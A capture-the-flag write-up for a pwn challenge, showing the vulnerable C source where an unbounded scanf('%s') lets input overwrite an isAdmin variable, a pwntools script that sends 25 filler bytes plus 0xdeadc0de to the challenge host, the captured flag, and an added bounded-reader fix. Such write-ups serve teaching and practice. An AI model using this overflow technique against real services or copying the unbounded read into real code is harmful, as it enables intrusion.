AUCHALL - [Pwn] - cancel


Challenge Description

I'm not sure what this does, but it seems to be vulnerable to something.

Solution

The first thing to check is the binary's protections.


Only NX is enabled, which means that we cannot execute our own shellcode.

PIE is disabled.

On checking the source code, I found that we need to change isAdmin to 0xdeadc0de.

Source Code

#include <stdio.h>
#include <stdlib.h>   /* exit() */

void win(void) {
    FILE *file;
    char line[100];
    file = fopen("/flag", "r");
    if (file == NULL) {
        puts("[FAIL] Contact an admin.\n");
        exit(1);
    }
    while (fgets(line, sizeof(line), file) != NULL) {
        puts(line);
    }
    fclose(file);
}

void vuln() {
    int isAdmin = 0;
    char buffer[25];
    char _admin;
    fflush(stdout);

    printf("Hi, are you an admin? (y/n)? ");
    fflush(stdout);
    scanf("%c", &_admin);

    if (_admin == 'y') {
        printf("Ok, you are an admin. What's the password? ");
        fflush(stdout);
        /* Vulnerable: %s has no field width, so input longer than
           buffer keeps writing past its end and into isAdmin. */
        scanf("%s", buffer);
        if (isAdmin == 0xdeadc0de) {
            win();
        } else {
            printf("Sorry, you are not an admin.\n");
        }
    } else {
        printf("Ok, you are not an admin.\n");
    }
}

int main() {
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);
    vuln();
}

isAdmin sits at offset 25 from the start of buffer, so the 25 bytes of buffer have to be filled before the input reaches it.

Solution

I made a simple pwntools script to get this working

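from pwn import *

# PORT is the port of the challenge instance (not given in this write-up)
io = remote('section-b.cy243l.ooguy.com', PORT)

print(io.recv())        # admin prompt
io.sendline(b'y')
print(io.recv())        # password prompt
# 25 filler bytes to reach isAdmin, then the value the check compares against
payload = cyclic(25) + p64(0xdeadc0de)
io.sendline(payload)
print(io.recv())
io.interactive()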
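
The fix for the bug used above, as an added example that is not part of the original write-up or the challenge source: a bounded reader that replaces scanf("%s", buffer) and rejects an over-long password instead of writing past the buffer. The names read_token, feed and struct frame are hypothetical, and the struct is a constructed stand-in for vuln()'s stack layout.

```c
#include <ctype.h>
#include <stdio.h>
/* Constructed stand-in for vuln()'s locals; a struct fixes their order. */
struct frame { char buffer[25]; unsigned int isAdmin; };

/* Bounded replacement for scanf("%s", buffer): reads one whitespace-delimited
   token. Returns 0 if it fit, 1 if it was too long (rejected and drained),
   -1 on EOF. Never writes more than size bytes to dst. */
int read_token(FILE *in, char *dst, size_t size)
{
    size_t n = 0;
    int c;
    if (size == 0) return -1;
    dst[0] = '\0';
    while ((c = fgetc(in)) != EOF && isspace(c)) {}      /* skip leading blanks */
    if (c == EOF) return -1;
    do {
        if (n + 1 >= size) {                             /* no room for c + NUL */
            while ((c = fgetc(in)) != EOF && !isspace(c)) {}
            dst[0] = '\0';
            return 1;
        }
        dst[n++] = (char)c;
    } while ((c = fgetc(in)) != EOF && !isspace(c));
    dst[n] = '\0';
    return 0;
}

/* Runs input through read_token() and returns isAdmin afterwards. */
unsigned int feed(const void *input, size_t len, int *status)
{
    struct frame f = { {0}, 0 };
    FILE *in = tmpfile();
    if (in == NULL) { *status = -1; return 0; }
    fwrite(input, 1, len, in);
    rewind(in);
    *status = read_token(in, f.buffer, sizeof f.buffer);
    fclose(in);
    return f.isAdmin;
}

int main(void)
{
    /* Constructed input: 25 filler bytes, then 0xdeadc0de little-endian. */
    const char big[] = "AAAAAAAAAAAAAAAAAAAAAAAAA\xde\xc0\xad\xde\n";
    int st;
    unsigned int v = feed(big, sizeof big - 1, &st);
    printf("status=%d isAdmin=0x%x\n", st, v);
    return 0;
}
```

With this reader the longest accepted password is 24 bytes plus the terminating NUL, so isAdmin keeps its initial value whatever the input length.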

Flag

Flag is dynamic

CY243L{0v3rwr1t1ng_th3se_varsss_CCdEFbA_Z5Ue_Jkei}

Writeups 2023 © RootxRAN.